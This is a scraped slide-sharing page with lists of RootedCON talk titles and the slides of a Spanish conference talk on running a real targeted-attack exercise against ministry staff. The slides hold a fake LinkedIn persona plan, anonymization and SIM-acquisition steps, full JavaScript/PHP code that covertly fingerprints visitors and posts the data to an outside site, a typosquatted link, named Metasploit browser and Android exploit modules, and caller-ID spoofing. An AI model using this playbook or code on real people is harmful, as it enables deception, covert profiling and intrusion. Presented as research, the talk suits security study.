Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...RootedCON
 
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...RootedCON
 
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguerRooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguerRootedCON
 
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...RootedCON
 
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemyRooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemyRootedCON
 
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...RootedCON
 
Rooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molinaRooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molinaRootedCON
 
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...RootedCON
 
Rooted2020 todo a-siem_-_marta_lopez
Rooted2020 todo a-siem_-_marta_lopezRooted2020 todo a-siem_-_marta_lopez
Rooted2020 todo a-siem_-_marta_lopezRootedCON
 
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valeroRooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valeroRootedCON
 
Rooted2020 live coding--_jesus_jara
Rooted2020 live coding--_jesus_jaraRooted2020 live coding--_jesus_jara
Rooted2020 live coding--_jesus_jaraRootedCON
 
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...RootedCON
 
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...RootedCON
 
Rooted2020 evading deep-learning_malware_detectors_-_javier_yuste
Rooted2020 evading deep-learning_malware_detectors_-_javier_yusteRooted2020 evading deep-learning_malware_detectors_-_javier_yuste
Rooted2020 evading deep-learning_malware_detectors_-_javier_yusteRootedCON
 
Rooted2020 encontrando 0days-en_2020_-_antonio_morales
Rooted2020 encontrando 0days-en_2020_-_antonio_moralesRooted2020 encontrando 0days-en_2020_-_antonio_morales
Rooted2020 encontrando 0days-en_2020_-_antonio_moralesRootedCON
 

Más de RootedCON (20)

Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro VillaverdeRooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
 
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
 
Rooted2020 hunting malware-using_process_behavior-roberto_amado
Rooted2020 hunting malware-using_process_behavior-roberto_amadoRooted2020 hunting malware-using_process_behavior-roberto_amado
Rooted2020 hunting malware-using_process_behavior-roberto_amado
 
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
 
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
 
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
 
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
 
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguerRooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
 
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
 
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemyRooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy
 
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
 
Rooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molinaRooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molina
 
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
 
Rooted2020 todo a-siem_-_marta_lopez
Rooted2020 todo a-siem_-_marta_lopezRooted2020 todo a-siem_-_marta_lopez
Rooted2020 todo a-siem_-_marta_lopez
 
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valeroRooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
 
Rooted2020 live coding--_jesus_jara
Rooted2020 live coding--_jesus_jaraRooted2020 live coding--_jesus_jara
Rooted2020 live coding--_jesus_jara
 
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
 
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
 
Rooted2020 evading deep-learning_malware_detectors_-_javier_yuste
Rooted2020 evading deep-learning_malware_detectors_-_javier_yusteRooted2020 evading deep-learning_malware_detectors_-_javier_yuste
Rooted2020 evading deep-learning_malware_detectors_-_javier_yuste
 
Rooted2020 encontrando 0days-en_2020_-_antonio_morales
Rooted2020 encontrando 0days-en_2020_-_antonio_moralesRooted2020 encontrando 0days-en_2020_-_antonio_morales
Rooted2020 encontrando 0days-en_2020_-_antonio_morales
 

Último

EPA-pdf resultado da prova presencial Uninove
EPA-pdf resultado da prova presencial UninoveEPA-pdf resultado da prova presencial Uninove
EPA-pdf resultado da prova presencial UninoveFagnerLisboa3
 
Hernandez_Hernandez_Practica web de la sesion 12.pptx
Hernandez_Hernandez_Practica web de la sesion 12.pptxHernandez_Hernandez_Practica web de la sesion 12.pptx
Hernandez_Hernandez_Practica web de la sesion 12.pptxJOSEMANUELHERNANDEZH11
 
La era de la educación digital y sus desafios
La era de la educación digital y sus desafiosLa era de la educación digital y sus desafios
La era de la educación digital y sus desafiosFundación YOD YOD
 
Proyecto integrador. Las TIC en la sociedad S4.pptx
Proyecto integrador. Las TIC en la sociedad S4.pptxProyecto integrador. Las TIC en la sociedad S4.pptx
Proyecto integrador. Las TIC en la sociedad S4.pptx241521559
 
Plan de aula informatica segundo periodo.docx
Plan de aula informatica segundo periodo.docxPlan de aula informatica segundo periodo.docx
Plan de aula informatica segundo periodo.docxpabonheidy28
 
Trabajo Mas Completo De Excel en clase tecnología
Trabajo Mas Completo De Excel en clase tecnologíaTrabajo Mas Completo De Excel en clase tecnología
Trabajo Mas Completo De Excel en clase tecnologíassuserf18419
 
Instrumentación Hoy_ INTERPRETAR EL DIAGRAMA UNIFILAR GENERAL DE UNA PLANTA I...
Instrumentación Hoy_ INTERPRETAR EL DIAGRAMA UNIFILAR GENERAL DE UNA PLANTA I...Instrumentación Hoy_ INTERPRETAR EL DIAGRAMA UNIFILAR GENERAL DE UNA PLANTA I...
Instrumentación Hoy_ INTERPRETAR EL DIAGRAMA UNIFILAR GENERAL DE UNA PLANTA I...AlanCedillo9
 
Global Azure Lima 2024 - Integración de Datos con Microsoft Fabric
Global Azure Lima 2024 - Integración de Datos con Microsoft FabricGlobal Azure Lima 2024 - Integración de Datos con Microsoft Fabric
Global Azure Lima 2024 - Integración de Datos con Microsoft FabricKeyla Dolores Méndez
 
CLASE DE TECNOLOGIA E INFORMATICA PRIMARIA
CLASE  DE TECNOLOGIA E INFORMATICA PRIMARIACLASE  DE TECNOLOGIA E INFORMATICA PRIMARIA
CLASE DE TECNOLOGIA E INFORMATICA PRIMARIAWilbisVega
 
SalmorejoTech 2024 - Spring Boot <3 Testcontainers
SalmorejoTech 2024 - Spring Boot <3 TestcontainersSalmorejoTech 2024 - Spring Boot <3 Testcontainers
SalmorejoTech 2024 - Spring Boot <3 TestcontainersIván López Martín
 
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...silviayucra2
 
Redes direccionamiento y subredes ipv4 2024 .pdf
Redes direccionamiento y subredes ipv4 2024 .pdfRedes direccionamiento y subredes ipv4 2024 .pdf
Redes direccionamiento y subredes ipv4 2024 .pdfsoporteupcology
 
Cortes-24-de-abril-Tungurahua-3 año 2024
Cortes-24-de-abril-Tungurahua-3 año 2024Cortes-24-de-abril-Tungurahua-3 año 2024
Cortes-24-de-abril-Tungurahua-3 año 2024GiovanniJavierHidalg
 
guía de registro de slideshare por Brayan Joseph
guía de registro de slideshare por Brayan Josephguía de registro de slideshare por Brayan Joseph
guía de registro de slideshare por Brayan JosephBRAYANJOSEPHPEREZGOM
 
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdfPARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdfSergioMendoza354770
 
International Women's Day Sucre 2024 (IWD)
International Women's Day Sucre 2024 (IWD)International Women's Day Sucre 2024 (IWD)
International Women's Day Sucre 2024 (IWD)GDGSucre
 
trabajotecologiaisabella-240424003133-8f126965.pdf
trabajotecologiaisabella-240424003133-8f126965.pdftrabajotecologiaisabella-240424003133-8f126965.pdf
trabajotecologiaisabella-240424003133-8f126965.pdfIsabellaMontaomurill
 
ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...
ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...
ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...FacuMeza2
 
KELA Presentacion Costa Rica 2024 - evento Protégeles
KELA Presentacion Costa Rica 2024 - evento ProtégelesKELA Presentacion Costa Rica 2024 - evento Protégeles
KELA Presentacion Costa Rica 2024 - evento ProtégelesFundación YOD YOD
 

Último (19)

EPA-pdf resultado da prova presencial Uninove
EPA-pdf resultado da prova presencial UninoveEPA-pdf resultado da prova presencial Uninove
EPA-pdf resultado da prova presencial Uninove
 
Hernandez_Hernandez_Practica web de la sesion 12.pptx
Hernandez_Hernandez_Practica web de la sesion 12.pptxHernandez_Hernandez_Practica web de la sesion 12.pptx
Hernandez_Hernandez_Practica web de la sesion 12.pptx
 
La era de la educación digital y sus desafios
La era de la educación digital y sus desafiosLa era de la educación digital y sus desafios
La era de la educación digital y sus desafios
 
Proyecto integrador. Las TIC en la sociedad S4.pptx
Proyecto integrador. Las TIC en la sociedad S4.pptxProyecto integrador. Las TIC en la sociedad S4.pptx
Proyecto integrador. Las TIC en la sociedad S4.pptx
 
Plan de aula informatica segundo periodo.docx
Plan de aula informatica segundo periodo.docxPlan de aula informatica segundo periodo.docx
Plan de aula informatica segundo periodo.docx
 
Trabajo Mas Completo De Excel en clase tecnología
Trabajo Mas Completo De Excel en clase tecnologíaTrabajo Mas Completo De Excel en clase tecnología
Trabajo Mas Completo De Excel en clase tecnología
 
Instrumentación Hoy_ INTERPRETAR EL DIAGRAMA UNIFILAR GENERAL DE UNA PLANTA I...
Instrumentación Hoy_ INTERPRETAR EL DIAGRAMA UNIFILAR GENERAL DE UNA PLANTA I...Instrumentación Hoy_ INTERPRETAR EL DIAGRAMA UNIFILAR GENERAL DE UNA PLANTA I...
Instrumentación Hoy_ INTERPRETAR EL DIAGRAMA UNIFILAR GENERAL DE UNA PLANTA I...
 
Global Azure Lima 2024 - Integración de Datos con Microsoft Fabric
Global Azure Lima 2024 - Integración de Datos con Microsoft FabricGlobal Azure Lima 2024 - Integración de Datos con Microsoft Fabric
Global Azure Lima 2024 - Integración de Datos con Microsoft Fabric
 
CLASE DE TECNOLOGIA E INFORMATICA PRIMARIA
CLASE  DE TECNOLOGIA E INFORMATICA PRIMARIACLASE  DE TECNOLOGIA E INFORMATICA PRIMARIA
CLASE DE TECNOLOGIA E INFORMATICA PRIMARIA
 
SalmorejoTech 2024 - Spring Boot <3 Testcontainers
SalmorejoTech 2024 - Spring Boot <3 TestcontainersSalmorejoTech 2024 - Spring Boot <3 Testcontainers
SalmorejoTech 2024 - Spring Boot <3 Testcontainers
 
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...
 
Redes direccionamiento y subredes ipv4 2024 .pdf
Redes direccionamiento y subredes ipv4 2024 .pdfRedes direccionamiento y subredes ipv4 2024 .pdf
Redes direccionamiento y subredes ipv4 2024 .pdf
 
Cortes-24-de-abril-Tungurahua-3 año 2024
Cortes-24-de-abril-Tungurahua-3 año 2024Cortes-24-de-abril-Tungurahua-3 año 2024
Cortes-24-de-abril-Tungurahua-3 año 2024
 
guía de registro de slideshare por Brayan Joseph
guía de registro de slideshare por Brayan Josephguía de registro de slideshare por Brayan Joseph
guía de registro de slideshare por Brayan Joseph
 
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdfPARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
 
International Women's Day Sucre 2024 (IWD)
International Women's Day Sucre 2024 (IWD)International Women's Day Sucre 2024 (IWD)
International Women's Day Sucre 2024 (IWD)
 
trabajotecologiaisabella-240424003133-8f126965.pdf
trabajotecologiaisabella-240424003133-8f126965.pdftrabajotecologiaisabella-240424003133-8f126965.pdf
trabajotecologiaisabella-240424003133-8f126965.pdf
 
ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...
ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...
ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...
 
KELA Presentacion Costa Rica 2024 - evento Protégeles
KELA Presentacion Costa Rica 2024 - evento ProtégelesKELA Presentacion Costa Rica 2024 - evento Protégeles
KELA Presentacion Costa Rica 2024 - evento Protégeles
 

APT en

  • 1. ‹#› Rooted Satellite Valencia SbD Buenas  Prác,cas  Forenses:
 Casos  reales  en  IOS  y  Linux Cooking an APT… in the paranoid way Lorenzo Martínez R. (@lawwait)
  • 2. [root@localhost ~]# whoami CTO && Founder www.securizame.com ! www.SecurityByDefault.com ! Perito Informático Forense ! Twitter: – @lawwait – @securizame – @secbydefault ! Email: lorenzo@securizame.com
  • 3. Historia y agradecimientos Anterior estudio y experiencia para empresa privada Generación de APT real Legalidad del APT Lecciones aprendidas y extrapolación Thanks to: – Yago Jesús… Tons of thanks! – Grupo de Delitos Telemáticos de la Guardia Civil Sector público: soy ciudadano Hasta el Ministerio y más allá…!!!
  • 4. Disclaimer Para llevar a cabo esta charla, durante la ejecución de la investigación, se cometieron varias irregularidades. El objetivo de la misma es meramente académico, sin intención de herir ninguna sensibilidad, ni ridiculizar a nadie No hagáis esto en casa!!!
  • 5. A Pwnearlo Todo!!! A Ponerte hacia Toledo!!! A Putearte También… ! A Por Todas!
  • 7. Planificando el APT El objetivo y su perfil El punto de entrada Un perfil con historia creible Correo electrónico Vida en redes sociales: Facebook, LinkedIN, Twitter?, Whatsapp? Web personal con venenos
  • 8. Material inicial Ordenador Disco duro cifrado de host -> Filevault/Bitlocker/ LUKS/¿Truecrypt? Distribución Live de usar y tirar en máquina virtual Tarjeta de red wireless externa + cambio de dirección MAC Random Agent Spoofer KeePassX
  • 9. Más Material Necesario Terminal telefónico (IMEI no asociado) – Smartphone – Tienda de segunda mano – Tienda de accesorios para móviles ! Tarjeta SIM – Prepago – DNI – Ingeniería Social – else… para SMS – http://sms-verification.com – http://receivefreesms.com
  • 10. Recursos necesarios… y anonimización ! Correo electrónico ! Cuenta en BitCoins ! UKASH 2 Bitcoins ! Canal cifrado, anónimo y sin logs ! Free website!
  • 11. Máquina de salto Máquina virtual guest con FS cifrado,… sobre sistema de ficheros cifrado en el host Squid configurado en modo anónimo VPN hacia iPredator: – Ruta directa hacia iPredator mediante gateway normal – Default gateway en el extremo del túnel – Firewall entrante en interfaz tun0 Opcional: ¿Acceso encapsulado mediante TOR? Navegación local a través de proxy con Random Agent Spoofer
  • 12. ¿A quién vamos a liar?
  • 13. Creamos un perfil LinkedIN Siempre a través de VPN Comprobación de dirección IP, antes de cualquier cosa Navegación en “modo porno” Tráfico de relleno variado: emule Nos piden una dirección de correo electrónico Perfil: – Nombre: Sugerente, no común,… pero sin pasarse – Nuestra foto – Presente y pasado Veneno: Sitio web personal
  • 14. ¿Hasta dónde quiero llegar? Preparación de la web maliciosa – Fecha – Dirección IP – Referer – User agent – Versiones de: • Java • Flash • Quicktime ! • Shockwave • WMP • Silverlight • RealPlayer • IEComponent • ActiveX • PDFjs
  • 15. Plugins detector (I) http://www.pinlady.net/PluginDetect/download <script type="text/javascript" src="hello.js"></script> <div style="position:relative;"> <div id="plugindetect" style=“position:absolute; left:0px; top:0px;”></div> ! <script type="text/javascript">! var ip = "<?php echo $_SERVER['SERVER_ADDR']; ?>";! var user_agent = "<?php echo $_SERVER['HTTP_USER_AGENT']; ?>";! var referrer = "<?php echo $_SERVER['HTTP_REFERER']; ?>";! ! var today = new Date();! var dd = today.getDate();! var mm = today.getMonth()+1; //Enero empieza en 0! var yyyy = today.getFullYear();! var hh = today.getHours();! var min = today.getMinutes();! var seg = today.getSeconds ();
  • 16. Plugins detector (II) if (dd<10) { dd=‘0'+ dd } ! if (mm<10) { mm=‘0’+ mm } ! if (hh<10) { hh=‘0'+ hh }! if (min<10) { min ='0'+ min }! if (seg<10) { seg ='0'+ seg }! var datetime = dd + "/"+ mm + "/" + yyyy + " "+ hh + ":" + min + ":" + seg; var width = screen.width; var height = screen.height; var flashversion = PluginDetect.getVersion("Flash"); var Java= PluginDetect.getVersion("Java"); var Quicktime = PluginDetect.getVersion("Quicktime"); var Shockwave = PluginDetect.getVersion("Shockwave"); var WMP = PluginDetect.getVersion("WMP"); var Silverlight = PluginDetect.getVersion("Silverlight"); var RealPlayer = PluginDetect.getVersion("RealPlayer"); var IEcomponent = PluginDetect.getVersion("IEcomponent"); var ActiveX = PluginDetect.getVersion("ActiveX"); var PDFjs = PluginDetect.getVersion("PDF.js"); var keep= datetime+ "|IP: " + ip + "|User-Agent " + user_agent + "|Resolution: " + width +"x"+ height + "|Referer: " + referrer + "|Java: " + Java + "|Flashversion: "+ flashversion + "|Quicktime: " + Quicktime + "|Shockwave: " + Shockwave + "|WMP: " + WMP + "|Silverlight: " + Silverlight + "|RealPlayer: " + RealPlayer + "|IEComponent: " + IEcomponent + "|ActiveX: " + ActiveX + "|PDFjs: " + PDFjs+"n"
  • 17. Plugins detector (III) var form = document.createElement(‘form');! form.setAttribute ("method", “POST");! form.setAttribute("action", “http://www.noenavarro.site90.com/main.php”);! var hiddenField = document.createElement("input"); hiddenField.setAttribute("type", "hidden"); hiddenField.setAttribute("name", "data"); hiddenField.setAttribute("value", keep); form.appendChild(hiddenField); document.body.appendChild(form); form.submit(); <?php if(!empty($_POST['data'])) { $data = $_POST['data']; $fname = "stats.txt"; $file = fopen($fname, 'a'); fwrite($file, $data); fclose($file); }?> <img src= en_construccion.png> main.php
  • 18. stats.txt 29/06/2014 14:42:01|IP: 31.170.162.223|User-Agent Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36 OPR/22.0.1471.70| Referer: |Javanull|Flashversion 13,0,0,0|Quicktime 7,7,3,0| Shockwave 12,1,0,0|WMP null|Silverlight 5,1,30317,0|RealPlayer null|IEComponent null|ActiveX null|PDFjs null | como separador de campos Importable en Excel
  • 19.
  • 20.
  • 21. Estrategia LinkedIN Horarios de funcionarios – 8:00 - 15:00 -> Mayor probabilidad de PC corporativo – 15:00 - XX:XX -> Dispositivo móvil Dificultad de búsquedas Visita de perfiles Target al Ministerio deseado… abriendo el abanico Generación de confianza: contactos de ambos sexos, contactos de vidas pasadas (trabajos anteriores, alumnos del colegio, skills y hobbies, etc,…) Adición a grupos relacionados + Google hacking Contactos recomendados Inconveniente añadido: Vacaciones de verano…
  • 22. Anécdotas LinkedIN Los DMs – El desconfiado/suspicaz – El curioso extrovertido El linkedin addict! El que pica el anzuelo Los “endorsements” Las felicitaciones por mi actividad Los múltiples “acojonos”
  • 24. Mi blog • Enlace acortado por el propio LinkedIn • www.noenavarro.site90.com/portugaI.php • Typosquatting -> portugaI.php vs. portugal.php
  • 25. Mi blog portugaI.php …<snip> var keep= datetime+ "|IP: " + ip + "|User-Agent " + user_agent + "|Resolution: " + width +"x"+ height + "|Referer: " + referrer + "|Java: " + Java + "|Flashversion: "+ flashversion + "| Quicktime: " + Quicktime + "|Shockwave: " + Shockwave + "|WMP: " + WMP + "|Silverlight: " + Silverlight + "|RealPlayer: " + RealPlayer + "|IEComponent: " + IEcomponent + "|ActiveX: " + ActiveX + "|PDFjs: " + PDFjs+"n" var form = document.createElement('form'); form.setAttribute ("method", "POST"); form.setAttribute("action", "http://www.noenavarro.site90.com/portugal.php"); var hiddenField = document.createElement("input"); hiddenField.setAttribute("type", "hidden"); hiddenField.setAttribute("name", "data"); hiddenField.setAttribute("value", keep); form.appendChild(hiddenField); document.body.appendChild(form); form.submit(); </snip>…
  • 26. Mi blog • portugal.php <html> <?php if(!empty($_POST['data'])) { $data = $_POST['data']; $fname = "stats.txt"; $file = fopen($fname, 'a'); fwrite($file, $data); fclose($file); } ?> ! <body bgcolor="#D3D3D3"> <basefont color="black" face="arial" size="14"> <style> #marco img { border: 2px solid #c3c3c3; background: #ffffff; padding:5px; display:block; } </style> <h1>Blog personal de Noelia Navarro</h1> <h3> ¡Hola lectores! <p> …
  • 27. • HTML puro ! • Borrado metadatos en las fotos (sean o no sean tuyas) ! • Redacción adecuada al perfil psicológico del personaje representado ! • Faltas de ortografía sutiles Mi blog
  • 28. Yo quiero tener un millón de amigos… 29 contactos
  • 29. Y tú, ¿de quién eres?
  • 30. Clientes vulnerables IOS 7.1.1 -> http://support.apple.com/kb/HT6297 Android 2.3.6!!! Java 1.6.0.29 (Sobre Windows 7) Java 1.6.0.32 (Sobre Windows XP) Flash 11.4.402.265 Silverlight 5.1.10411.0
  • 31.
  • 32. Else… Lo que “podría” haber hecho Registro de dominio g0b.es
  • 33. VPS 4 Bitcoins Else… Lo que “podría” haber hecho
  • 34. Lo que “podría” haber hecho: lo fácil use auxiliary/server/browser_autopwn
  • 35. En base al navegador según user_agent, redirección adecuada – Windows: Java, Flash, Silverlight,… – IOS: – Phishing por time-out – Poner en title una URL válida,… – Android: – use exploit/android/browser/ webview_addjavascriptinterface (CVE-2013-4710) – USSD -> <iframe> tel: </iframe> Lo que “podría” haber hecho: personalizado
  • 36. Lo que “podría” haber hecho
  • 38. • Compra de certificado SSL (Comodo) Else… Lo que podría haber hecho
  • 39. Spoofing de llamada iPredator ! Google Hangouts Dialer ! Spoofcard ! Pranking: – Número de “mi ministerio” – Modificación de voz – Grabación de llamada
  • 40. Sé lo que hiciste el último verano…
  • 41. Hasta pronto!! (Tres años y un día)Disclaimers y Conclusiones Para llevar a cabo esta charla, durante la ejecución de la investigación, se cometieron varias irregularidades El objetivo de la misma es meramente académico (y para esta conferencia), sin intención de herir ninguna sensibilidad, ni ridiculizar a nadie He cedido todo el material y explicaciones con mayor detalle al Grupo de Delitos Telemáticos de la Guardia Civil
  • 42. Email me: lorenzo@securizame.com Twitter: @lawwait @securizame @secbydefault SbD